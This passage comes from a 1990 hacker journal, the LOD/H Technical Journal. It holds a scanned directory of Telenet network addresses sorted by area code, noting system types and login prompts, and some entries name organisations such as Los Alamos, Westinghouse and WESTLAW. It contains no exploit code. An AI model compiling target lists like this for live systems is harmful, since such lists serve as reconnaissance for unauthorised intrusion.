----------------------------------------------------
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
$ 31 AOS
|
|||
|
$ 34 AOS
|
|||
|
$ 36 AOS
|
|||
|
* 38
|
|||
|
$ 46 PRIME SYSU
|
|||
|
49 MMISC
|
|||
|
60 MGIC
|
|||
|
81a
|
|||
|
* 120
|
|||
|
$ 131 AOS
|
|||
|
$ 132 AOS
|
|||
|
$ 134 AOS
|
|||
|
$ 136 AOS
|
|||
|
$ 137 AOS
|
|||
|
* 151
|
|||
|
153
|
|||
|
189a
|
|||
|
|
|||
|
|
|||
|
415--CALIFORNIA--ADDRESSES SCANNED: 0-1300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 5 PC Pursuit Dialer (2400)
|
|||
|
7 HP-3000
|
|||
|
$ 11 PC Pursuit Dialer (1200)
|
|||
|
20 Dialog
|
|||
|
27 Stanford Data Center
|
|||
|
29 Stnaford U. Hospital
|
|||
|
$ 34 AOS
|
|||
|
38 HP-3000
|
|||
|
* 39
|
|||
|
$ 45 PRIME CESSF
|
|||
|
48 Dialog
|
|||
|
49 "
|
|||
|
53 VAX
|
|||
|
$ 106 Telenet Async to 3270
|
|||
|
$ 108 PC Pursuit Dialer (300)
|
|||
|
$ 109 PC Pursuit Dialer (1200)
|
|||
|
$ 130 AOS
|
|||
|
* 138
|
|||
|
* 139
|
|||
|
* 142
|
|||
|
* 143
|
|||
|
* 144
|
|||
|
* 145
|
|||
|
$ 157 VAX MENLO
|
|||
|
158 ComMail Esprit de Corp
|
|||
|
$ 164 AOS
|
|||
|
167 PRIME VESTEK
|
|||
|
* 174
|
|||
|
* 178
|
|||
|
$ 215 PC Pursuit Dialer (300)
|
|||
|
$ 216 PC Pursuit Dialer (1200)
|
|||
|
$ 217 PC Pursuit Dialer (2400)
|
|||
|
$ 224 PC Pursuit Dialer (2400)
|
|||
|
238 GEONET
|
|||
|
239 Telenet Async to 3270
|
|||
|
242 VAX
|
|||
|
* 252
|
|||
|
269 LUT Rel 3.2>
|
|||
|
$ 333 AOS
|
|||
|
$ 335 AOS
|
|||
|
338 Telenet Async to 3270
|
|||
|
342 Dialog
|
|||
|
343 Telenet Async to 3270
|
|||
|
345 SBE Inc.
|
|||
|
* 348
|
|||
|
* 370
|
|||
|
379 VAX
|
|||
|
$ 431 AOS
|
|||
|
$ 434 AOS
|
|||
|
$ 436 AOS
|
|||
|
$ 437 AOS
|
|||
|
$ 438 AOS
|
|||
|
452 Telmar Intl Network
|
|||
|
* 460
|
|||
|
* 468
|
|||
|
$ 470
|
|||
|
$ 471
|
|||
|
$ 541 AOS
|
|||
|
$ 542 AOS
|
|||
|
$ 543 AOS
|
|||
|
$ 544 AOS
|
|||
|
$ 545 AOS
|
|||
|
* 546
|
|||
|
$ 547 AOS
|
|||
|
$ 549 AOS
|
|||
|
* 551
|
|||
|
* 560
|
|||
|
* 571
|
|||
|
572 VAX
|
|||
|
575 VAX SPRINT
|
|||
|
576
|
|||
|
578
|
|||
|
672 Telenet Async to 3270
|
|||
|
698
|
|||
|
$ 730 AOS
|
|||
|
$ 731 AOS
|
|||
|
$ 732 AOS
|
|||
|
$ 733 AOS
|
|||
|
* 734
|
|||
|
* 735
|
|||
|
* 736
|
|||
|
* 737
|
|||
|
* 738
|
|||
|
* 739
|
|||
|
* 740
|
|||
|
* 741
|
|||
|
780
|
|||
|
827
|
|||
|
1030 PRIME
|
|||
|
1036 OVL 111 44 IDLE
|
|||
|
1037
|
|||
|
1038
|
|||
|
1055
|
|||
|
1063
|
|||
|
1200 enter switch characters
|
|||
|
1201 "
|
|||
|
1202 "
|
|||
|
1205 "
|
|||
|
|
|||
|
|
|||
|
419--OHIO--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 35
|
|||
|
|
|||
|
|
|||
|
422--WESTINGHOUSE--ADDRESSES SCANNED: 0-1125
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
1 PRIME
|
|||
|
2
|
|||
|
102 ARDM1
|
|||
|
104 HP-3000
|
|||
|
106 GS/1
|
|||
|
114 west pgh tcc
|
|||
|
115 corp info service
|
|||
|
121 AOS
|
|||
|
126 tcc1
|
|||
|
127 csc2
|
|||
|
130 PRIME
|
|||
|
132 UNIX
|
|||
|
135 UNIX
|
|||
|
140
|
|||
|
141 VAX
|
|||
|
180 MHP1201I
|
|||
|
182 "
|
|||
|
183 "
|
|||
|
185 "
|
|||
|
187 "
|
|||
|
194 Commtex CX-80
|
|||
|
221
|
|||
|
222 HP-3000
|
|||
|
223 VAX
|
|||
|
229
|
|||
|
|
|||
|
|
|||
|
424--UNKNOWN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
100
|
|||
|
101
|
|||
|
102
|
|||
|
103
|
|||
|
104
|
|||
|
114
|
|||
|
115
|
|||
|
116
|
|||
|
122
|
|||
|
123
|
|||
|
129
|
|||
|
130
|
|||
|
|
|||
|
==============================================================================
|
|||
|
|
|||
|
End of First Half of LOD/H Telenet Directory, Rev. #5
|
|||
|
==============================================================================
|
|||
|
The LOD/H Technical Journal, Issue #4: File #09 of 10
|
|||
|
|
|||
|
The Legion Of Hackers Present:
|
|||
|
Updated: Telenet Directory
|
|||
|
Part B: Addresses 501XXX to 919XXX
|
|||
|
Revision #5 Last Updated: 2/10/90
|
|||
|
(Includes Mnemonic Host Names)
|
|||
|
|
|||
|
Scanned and Written by:
|
|||
|
Erik Bloodaxe
|
|||
|
|
|||
|
|
|||
|
501--ARKANSAS--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 AOS
|
|||
|
* 32
|
|||
|
* 38
|
|||
|
$ 44 PRIME LROCK
|
|||
|
|
|||
|
|
|||
|
502--KENTUCKY--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 50
|
|||
|
* 58
|
|||
|
* 60
|
|||
|
* 61
|
|||
|
|
|||
|
|
|||
|
503--OREGON--ADDRESSES SCANNED: 0-1000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 PC Pursuit Dialer (300)
|
|||
|
$ 21 PC Pursuit Dialer (1200)
|
|||
|
$ 30 AOS
|
|||
|
$ 31 AOS
|
|||
|
$ 32
|
|||
|
$ 36 AOS
|
|||
|
$ 37 AOS
|
|||
|
$ 39 AOS
|
|||
|
$ 40 AOS
|
|||
|
* 41
|
|||
|
$ 45 AOS
|
|||
|
$ 46 AOS
|
|||
|
$ 47 AOS
|
|||
|
$ 48 AOS
|
|||
|
$ 49 AOS
|
|||
|
$ 52 AOS
|
|||
|
$ 56 AOS
|
|||
|
$ 60 AOS
|
|||
|
$ 63 AOS
|
|||
|
$ 68 AOS
|
|||
|
$ 71 AOS
|
|||
|
75 PLEASE SIGN ON
|
|||
|
$ 76 AOS
|
|||
|
$ 77 AOS
|
|||
|
$ 78 AOS
|
|||
|
120
|
|||
|
$ 130 AOS
|
|||
|
$ 132 AOS
|
|||
|
$ 134 AOS
|
|||
|
$ 136 AOS
|
|||
|
$ 137 AOS
|
|||
|
$ 138 AOS
|
|||
|
$ 141 AOS
|
|||
|
$ 142 AOS
|
|||
|
* 143
|
|||
|
$ 147 AOS
|
|||
|
$ 149 AOS
|
|||
|
$ 150 TEKTRONIX 100
|
|||
|
$ 151 AOS
|
|||
|
$ 152 AOS
|
|||
|
$ 154 AOS
|
|||
|
$ 156 AOS
|
|||
|
* 162
|
|||
|
$ 167 AOS
|
|||
|
$ 168 AOS
|
|||
|
$ 169 AOS
|
|||
|
$ 170 AOS
|
|||
|
$ 174 AOS
|
|||
|
$ 177 AOS
|
|||
|
$ 200 AOS
|
|||
|
* 228
|
|||
|
* 229
|
|||
|
$ 230 AOS
|
|||
|
* 232
|
|||
|
* 237
|
|||
|
$ 238 AOS
|
|||
|
$ 239 AOS
|
|||
|
* 240
|
|||
|
$ 241 AOS
|
|||
|
$ 242 AOS
|
|||
|
$ 243 ID
|
|||
|
$ 250 AOS
|
|||
|
$ 255 AOS
|
|||
|
$ 274 AOS
|
|||
|
$ 277 AOS
|
|||
|
$ 278 AOS
|
|||
|
$ 279 AOS
|
|||
|
$ 330 AOS
|
|||
|
$ 331 AOS
|
|||
|
$ 332 AOS
|
|||
|
$ 334 AOS
|
|||
|
$ 335 AOS
|
|||
|
$ 336 AOS
|
|||
|
$ 338 AOS
|
|||
|
$ 339 AOS
|
|||
|
$ 340 AOS
|
|||
|
$ 341 AOS
|
|||
|
$ 342 AOS
|
|||
|
$ 345 AOS
|
|||
|
$ 349 AOS
|
|||
|
$ 350 AOS
|
|||
|
$ 351 AOS
|
|||
|
$ 353 AOS
|
|||
|
$ 355 AOS
|
|||
|
$ 357 AOS
|
|||
|
$ 360 AOS
|
|||
|
$ 370 AOS
|
|||
|
$ 371 AOS
|
|||
|
$ 432 AOS
|
|||
|
$ 440 AOS
|
|||
|
613 UNIX sequent
|
|||
|
|
|||
|
|
|||
|
504--LOUISIANA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 22
|
|||
|
$ 31 ID
|
|||
|
$ 32 AOS
|
|||
|
$ 33 AOS
|
|||
|
$ 34 AOS
|
|||
|
* 38
|
|||
|
* 44
|
|||
|
* 116
|
|||
|
* 117
|
|||
|
$ 140 AOS
|
|||
|
* 141
|
|||
|
* 142
|
|||
|
|
|||
|
|
|||
|
505--NEW MEXICO--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 ID
|
|||
|
$ 33 AOS
|
|||
|
* 34
|
|||
|
$ 36 AOS
|
|||
|
$ 40 AOS
|
|||
|
* 45
|
|||
|
$ 46 AOS
|
|||
|
$ 51 AOS
|
|||
|
$ 52 AOS
|
|||
|
$ 53 AOS
|
|||
|
$ 56 AOS
|
|||
|
$ 57 AOS
|
|||
|
$ 60 ICN Username:
|
|||
|
$ 61 Los Alamos
|
|||
|
$ 70 AOS
|
|||
|
$ 72 AOS
|
|||
|
$ 74 AOS
|
|||
|
$ 75 AOS
|
|||
|
$ 77 AOS
|
|||
|
$ 78 AOS
|
|||
|
$ 132 AOS
|
|||
|
$ 133 AOS
|
|||
|
* 134
|
|||
|
$ 136 AOS
|
|||
|
$ 137 AOS
|
|||
|
$ 139 AOS
|
|||
|
$ 144
|
|||
|
$ 150
|
|||
|
|
|||
|
|
|||
|
509--WASHINGTON--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 25 AOS
|
|||
|
$ 26 AOS
|
|||
|
$ 31 AOS
|
|||
|
$ 32 ID
|
|||
|
* 33
|
|||
|
$ 48 AOS
|
|||
|
$ 50 AOS
|
|||
|
$ 73 AOS
|
|||
|
$ 79 AOS
|
|||
|
* 130
|
|||
|
* 140
|
|||
|
* 145
|
|||
|
|
|||
|
|
|||
|
511--UNKNOWN--ADDRESSES SCANNED: 0-250
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
87
|
|||
|
|
|||
|
|
|||
|
512--TEXAS--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 5
|
|||
|
$ 33 PRIME BROWNS
|
|||
|
$ 34 PRIME AUSTIN
|
|||
|
40
|
|||
|
* 55
|
|||
|
* 62
|
|||
|
* 63
|
|||
|
* 64
|
|||
|
* 65
|
|||
|
136
|
|||
|
* 139
|
|||
|
142 VAX Gould Inc.
|
|||
|
$ 242 Primefax Info Service
|
|||
|
|
|||
|
|
|||
|
513--OHIO--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
30 LEXIS/NEXIS
|
|||
|
31 Meadnet
|
|||
|
* 32
|
|||
|
$ 33 PRIME D01
|
|||
|
$ 34 VAX
|
|||
|
$ 37 PRIME E03
|
|||
|
$ 55 PRIME I01
|
|||
|
$ 57 PRIME E04
|
|||
|
59 Develnet
|
|||
|
$ 65 VAX
|
|||
|
* 66
|
|||
|
$ 67 PRIME E09
|
|||
|
$ 68 PRIME X01
|
|||
|
* 69
|
|||
|
$ 72 PRIME O1
|
|||
|
* 73
|
|||
|
$ 74 PRIME W01
|
|||
|
* 75
|
|||
|
$ 77 PRIME M01
|
|||
|
$ 78 PRIME A02
|
|||
|
$ 79 PRIME C2
|
|||
|
$ 80 JETNET EVENDALE
|
|||
|
131 LEXIS/NEXIS
|
|||
|
132 "
|
|||
|
133 "
|
|||
|
134 "
|
|||
|
* 140
|
|||
|
143 VAX
|
|||
|
* 144
|
|||
|
* 158
|
|||
|
|
|||
|
|
|||
|
515--IOWA--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
30 LEXIS/NEXIS
|
|||
|
31 "
|
|||
|
$ 39 PRIME NVSL
|
|||
|
$ 40 ID
|
|||
|
* 41
|
|||
|
* 42
|
|||
|
$ 43 PRIME DESMOM
|
|||
|
131 LEXIS/NEXIS
|
|||
|
|
|||
|
|
|||
|
516--NEW YORK--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
30 VAX OFFICE
|
|||
|
35 CCI MULTILINK
|
|||
|
* 38
|
|||
|
$ 41 VAX
|
|||
|
45 VM/370
|
|||
|
47
|
|||
|
48a Customer id:
|
|||
|
49a "
|
|||
|
50a "
|
|||
|
* 140
|
|||
|
$ 141 # CONNECT REQUESTED
|
|||
|
157
|
|||
|
$ 232 HP-3000
|
|||
|
600 PRIME
|
|||
|
* 601
|
|||
|
610 PRIME P550
|
|||
|
617 Pi-Net
|
|||
|
618 Pi-Net
|
|||
|
625 VAX
|
|||
|
655
|
|||
|
|
|||
|
|
|||
|
517--MICHIGAN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 40
|
|||
|
$ 42 AOS
|
|||
|
|
|||
|
|
|||
|
518--NEW YORK--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
30 USSMSG2
|
|||
|
31 "
|
|||
|
35 "
|
|||
|
36 "
|
|||
|
37 "
|
|||
|
|
|||
|
|
|||
|
601--MISSISSIPPI--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 ID
|
|||
|
$ 33 PRIME GLFPRT
|
|||
|
* 36
|
|||
|
* 37
|
|||
|
* 40
|
|||
|
|
|||
|
|
|||
|
602--ARIZONA--ADDRESSES SCANNED: 0-1000
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 22 PC Pursuit Dialer (300)
|
|||
|
$ 23 PC Pursuit Dialer (1200)
|
|||
|
$ 26 PC Pursuit Dialer (2400)
|
|||
|
* 30
|
|||
|
* 32
|
|||
|
$ 33 AOS
|
|||
|
$ 34 AOS
|
|||
|
$ 35 GTE COMMUNICATION SYSTEMS
|
|||
|
$ 53a CYBER
|
|||
|
* 55
|
|||
|
$ 56 AOS
|
|||
|
$ 57 AOS
|
|||
|
$ 58 AOS
|
|||
|
$ 61 AOS
|
|||
|
$ 62 ID
|
|||
|
$ 65 AOS
|
|||
|
* 66
|
|||
|
$ 67 AOS
|
|||
|
$ 100 AOS
|
|||
|
* 131
|
|||
|
* 133
|
|||
|
141a
|
|||
|
142
|
|||
|
$ 242 AOS
|
|||
|
$ 344 VAX BUSTOP
|
|||
|
* 349
|
|||
|
* 350
|
|||
|
* 351
|
|||
|
* 352
|
|||
|
* 353
|
|||
|
* 354
|
|||
|
* 355
|
|||
|
* 356
|
|||
|
* 357
|
|||
|
* 358
|
|||
|
* 359
|
|||
|
* 360
|
|||
|
* 361
|
|||
|
603
|
|||
|
$ 630 >
|
|||
|
|
|||
|
|
|||
|
603--NEW HAMPSHIRE--ADDRESSES SCANNED: 0-700
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 20 Dartmouth College
|
|||
|
$ 30 AOS
|
|||
|
* 33
|
|||
|
$ 36 ID
|
|||
|
$ 37
|
|||
|
$ 40
|
|||
|
46 USER NUMBER--
|
|||
|
51 CHUBBS online
|
|||
|
53 CHUBBS online
|
|||
|
$ 57 ID
|
|||
|
* 58
|
|||
|
66 USER NUMBER--
|
|||
|
135 VM/370
|
|||
|
136 VM/370
|
|||
|
* 137
|
|||
|
603 VAX
|
|||
|
|
|||
|
|
|||
|
606--KENTUCKY--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 ID
|
|||
|
$ 37 AOS
|
|||
|
44 HP-3000
|
|||
|
|
|||
|
|
|||
|
607--NEW YORK--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
* 30
|
|||
|
* 32
|
|||
|
44 enter system id
|
|||
|
45 "
|
|||
|
70 PRIME FDC99
|
|||
|
* 131
|
|||
|
* 136
|
|||
|
|
|||
|
|
|||
|
608--WISCONSIN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
35 enter logon command
|
|||
|
$ 140 ID
|
|||
|
* 141
|
|||
|
|
|||
|
|
|||
|
609--NEW JERSEY--ADDRESSES SCANNED: 0-300
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 23 enter class
|
|||
|
$ 26 UNSUPPORTED FUNCTION
|
|||
|
42 Dow Jones
|
|||
|
46 Dow Jones
|
|||
|
$ 47 HP-3000
|
|||
|
$ 61 UC
|
|||
|
$ 63 UC
|
|||
|
$ 68 UC
|
|||
|
$ 73
|
|||
|
100 PRIME
|
|||
|
124
|
|||
|
$ 125 HP-3000
|
|||
|
$ 126 UC
|
|||
|
$ 132 PRIME MOORES
|
|||
|
$ 136 Twain Terminal Server
|
|||
|
138 PRIME HCIONE
|
|||
|
$ 141 UNSUPPORTED FUNCTION
|
|||
|
$ 145 ID
|
|||
|
170 PRIME
|
|||
|
* 171
|
|||
|
$ 172 UC
|
|||
|
232a MHP2021 APPLICATION:
|
|||
|
242 Dow Jones
|
|||
|
243 Dow Jones
|
|||
|
244 Dow Jones
|
|||
|
|
|||
|
|
|||
|
611--UNKNOWN--ADDRESSES SCANNED: 0-400
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
25 TRANSEND
|
|||
|
26 "
|
|||
|
27 "
|
|||
|
28 "
|
|||
|
39 CCF Development System
|
|||
|
56 CCF Computing Facility
|
|||
|
60 Nexnet
|
|||
|
120 VAX
|
|||
|
130 TOPS-20 F.A.S.T.
|
|||
|
145 Good Evening,Please Logon:
|
|||
|
150 PRIME MHT850
|
|||
|
192 PRIME
|
|||
|
193 PRIME
|
|||
|
194 PRIME
|
|||
|
195 PRIME
|
|||
|
196 PRIME LDN
|
|||
|
198 PRIME DEV2
|
|||
|
234
|
|||
|
235 MHCOMET
|
|||
|
236 "
|
|||
|
237 "
|
|||
|
238 "
|
|||
|
|
|||
|
|
|||
|
612--MINNESOTA--ADDRESSES SCANNED: 0-500
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
21a
|
|||
|
$ 22 PC Pursuit Dialer (2400)
|
|||
|
23 WESTLAW
|
|||
|
$ 33 ID
|
|||
|
34 WESTLAW
|
|||
|
36
|
|||
|
37 WESTLAW
|
|||
|
$ 44 AOS
|
|||
|
$ 46 CDCNET
|
|||
|
$ 52 PRIME
|
|||
|
* 53
|
|||
|
56 WESTLAW
|
|||
|
57 "
|
|||
|
$ 69 ID
|
|||
|
$ 70 AOS
|
|||
|
* 71
|
|||
|
$ 120 PC Pursuit Dialer (300)
|
|||
|
$ 121 PC Pursuit Dialer (1200)
|
|||
|
$ 131 ID
|
|||
|
* 132
|
|||
|
* 138
|
|||
|
$ 139 VAX
|
|||
|
$ 162 PRIME PIERRE
|
|||
|
* 231
|
|||
|
* 232
|
|||
|
* 233 AOS
|
|||
|
236
|
|||
|
240 MSC X.25 Gateway
|
|||
|
* 251
|
|||
|
* 252
|
|||
|
$ 260 CDCNET
|
|||
|
270 WESTLAW
|
|||
|
271 "
|
|||
|
* 332
|
|||
|
* 333
|
|||
|
$ 340 AOS
|
|||
|
$ 351 AOS
|
|||
|
356 WESTLAW
|
|||
|
357 "
|
|||
|
358 "
|
|||
|
359 "
|
|||
|
362 "
|
|||
|
363 "
|
|||
|
364 "
|
|||
|
365 "
|
|||
|
366 "
|
|||
|
367 "
|
|||
|
369 "
|
|||
|
385
|
|||
|
391 WESTLAW
|
|||
|
393 "
|
|||
|
* 430
|
|||
|
442 please LOGIN
|
|||
|
|
|||
|
|
|||
|
614--OHIO--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 ID
|
|||
|
* 36
|
|||
|
* 130
|
|||
|
$ 131 AOS
|
|||
|
* 132
|
|||
|
|
|||
|
|
|||
|
615--TENNESSEE--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
$ 31 ID
|
|||
|
$ 32
|
|||
|
$ 33 PRIME FRKFRT
|
|||
|
$ 34 AOS
|
|||
|
* 36
|
|||
|
* 50
|
|||
|
* 55
|
|||
|
139a Telenet Async to 3270
|
|||
|
|
|||
|
|
|||
|
616--MICHIGAN--ADDRESSES SCANNED: 0-200
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
$ 30 AOS
|
|||
|
45 VAX ACTEST
|
|||
|
$ 50
|
|||
|
$ 51
|
|||
|
58 MHP201A
|
|||
|
63 Meridian
|
|||
|
|
|||
|
|
|||
|
617--MASSACHUSETTS--ADDRESSES SCANNED: 0-1100
|
|||
|
|
|||
|
$ ADDR SYSTEM TYPE OWNER/SYSTEM NAME/RESPONSE
|
|||
|
----------------------------------------------------
|
|||
|
20 PRIME PBN27
|
|||
|
22 PRIME BDSD
|
|||
|
* 26
|
|||
|
* 29
|
|||
|
$ 30 GS/1
|
|||
|
37 PRIME BDSH
|
|||
|
46 PRIME BDSS
|
|||
|
$ 47 ENTER ACCESS PASSWORD:
|
|||
|
48 VAX
|
|||
|
* 51
|
|||
|
$ 56
|
|||
|
* 61a
|
|||
|
$ 64 PRIME OPS
|
|||
|
67 PRIME IRI System 1
|
|||
|
72 PRIME IRI System 2
|
|||
|
74 PRIME ENB
|
|||
|
* 78
|
|||
|
* 114
|
|||
|
* 115
|
|||
|
143 IDC/370
|
|||
|
147 HP-3000
|
|||
|
152 ENTER LOGON
|
|||
|
* 153
|
|||
|
158 PRIME BDSW
|
|||
|
164
|
|||
|
169
|
|||
|
201
|
|||
|
205 AOS MONARCH
|
|||
|
206
|
|||
|
226 VM/370
|
|||
|
* 230
|
|||
|
236 VAX Thompson Financial Network
|
|||
|
237 UNIX b1cs4
|
|||
|
249 Decserver
|
|||
|
250 NDNA
|
|||
|
255 PRIME PBN43
|
|||
|
256 MGS Teaching Program
|
|||
|
* 266
|
|||
|
270 VAX SNOOPY
|
|||
|
273 enter system id
|
|||
|
* 274
|
|||
|
291
|
|||
|
$ 311 PC Pursuit Dialer (300)
|
|||
|
$ 313 PC Pursuit Dialer (1200)
|
|||
|
330 VAX
|
|||
|
* 336
|
|||
|
$ 341 VAX
|
|||
|
$ 347 HP-3000
|
|||
|
349
|
|||
|
350 PRIME PBN39
|
|||
|
351 PRIME BDSU
|
|||
|
352 PRIME OASB
|
|||
|
354 VAX Anchor Comm. Router
|
|||
|
359 VAX HEWEY
|
|||
|
* 371
|
|||
|
* 372
|
|||
|
379 $$ 4200 MODEL:
|
|||
|
380 PRIME L01
|
|||
|
381 PRIME P01
|
|||
|
382 PRIME Y01
|
|||
|
383 PRIME H02
|
|||
|
387 PRIME B01
|
|||
|
388 $$ 4200 MODEL:
|
|||
|
391 PRIME P01
|
|||
|
393 PRIME Y04
|
|||
|
398 PRIME V03
|
|||
|
437 HP-3000
|
|||
|
443 IDC/370
|
|||
|
446 PRIME ENO
|
|||
|
447 PRIME ENL
|
|||
|
451
|
|||
|
452 PRIME NET
|
|||
|
454 PRIME NORTON
|
|||
|
457 PRIME NNEB
|
|||
|
476 PRIME NNEB
|
|||
|
* 460
|
|||
|
* 465
|
|||
|
491 PRIME ROCH
|
|||
|
492 PRIME MELVLE
|
|||
|
493 PRIME STMFRD
|
|||
|
499 PRIME SYRA
|
|||
|
501 PRIME OASC
|
|||
|
502 PRIME APPLE
|
|||
|
510 PRIME EN.C06
|
|||
|
515 UNIX
|
|||
|
516 PRIME PBN38
|
|||
|
517 PRIME PBN38
|
|||
|
518 PRIME BDSA
|
|||
|
519 PRIME PBN54
|
|||
|
520 PRIME PBN57
|
|||
|
525 PRIME IRI System 8
|
|||
|
530 Maxlink
|
|||
|
541 PRIME BDSS
|
|||
|
543 PRIME PBN37
|
|||
|
550 PRIME B01
|
|||
|
551 PRIME CSP-A
|
|||
|
553 PRIME BDSQ
|
|||
|
556 PRIME
|
|||
|
558 PRIME CSSS.A
|
|||
|
560 PRIME BDSN
|
|||
|
562 PRIME BDS2
|
|||
|
563 PRIME
|
|||
|
568 PRIME OASI
|
|||
|
575 PRIME PBN50
|
|||
|
577 PRIME B30
|
|||
|
578 PRIME B04
|
|||
|
583 PRIME MD.HFD
|
|||
|
587 PRIME TR.SCH
|
|||
|
* 588
|
|||
|
$ 589
|
|||
|
* 590
|
|||
|
591 PRIME EN.M19
|
|||
|
593 PRIME BDSO
|
|||
|
596 PRIME MKT
|
|||
|
597 PRIME BDSB
|
|||
|
599 PRIME OASJ
|
|||
|
618 UNIX
|
|||
|
* 623
|
|||
|
641 AOS Timeplace Inc.
|
|||
|
649 PAPERCHASE
|
|||
|
654 PRIME IRI System 9
|
|||
|
710 PRIME MD.ATC
|
|||
|
711 PRIME AESE01
|
|||
|
713 PRIME PEACH
|
|||
|
716 PRIME WAYNE
|
|||
|
717 PRIME ETHEL
|
|||
|
718 PRIME BUGS
|
|||
|
722 PRIME PBN31
|
|||
|
723 PRIME MD.NJ
|
|||
|
724 PRIME NYMCS
|
|||
|
725 PRIME PRNCTN
|
|||
|
726 PRIME NJCENT
|
|||
|
736 VAX Butterworths
|
|||
|
737 VAX "
|
|||
|
$ 840 PRIME WALTHM
|
|||
|
850 PRIME MD-CHI
|
|||
|
851 PRIME PBN30
|
|||
|
852 PRIME MD.LP1
|
|||
|
855 PRIME TRNG.C
|
|||
|
856 PRIME CS.CHI
|
|||
|
857 PRIME CS.OAK
|
|||
|
858 PRIME CS-DEN
|
|||
|
859 PRIME AWCE02
|
|||
|
861 PRIME PTCDET
|
|||
|
862 PRIME DRBN1
|
|||
|
864 PRIME CS.DET
|
|||
|
865 PRIME MD.DET
|
|||
|
866 PRIME MD.DAC
|
|||
|
867 PRIME ACEC01
|
|||
|
868 PRIME MD.GR
|
|||
|
870 PRIME CS.IND
|
|||
|
871 PRIME MD.IND
|
|||
|
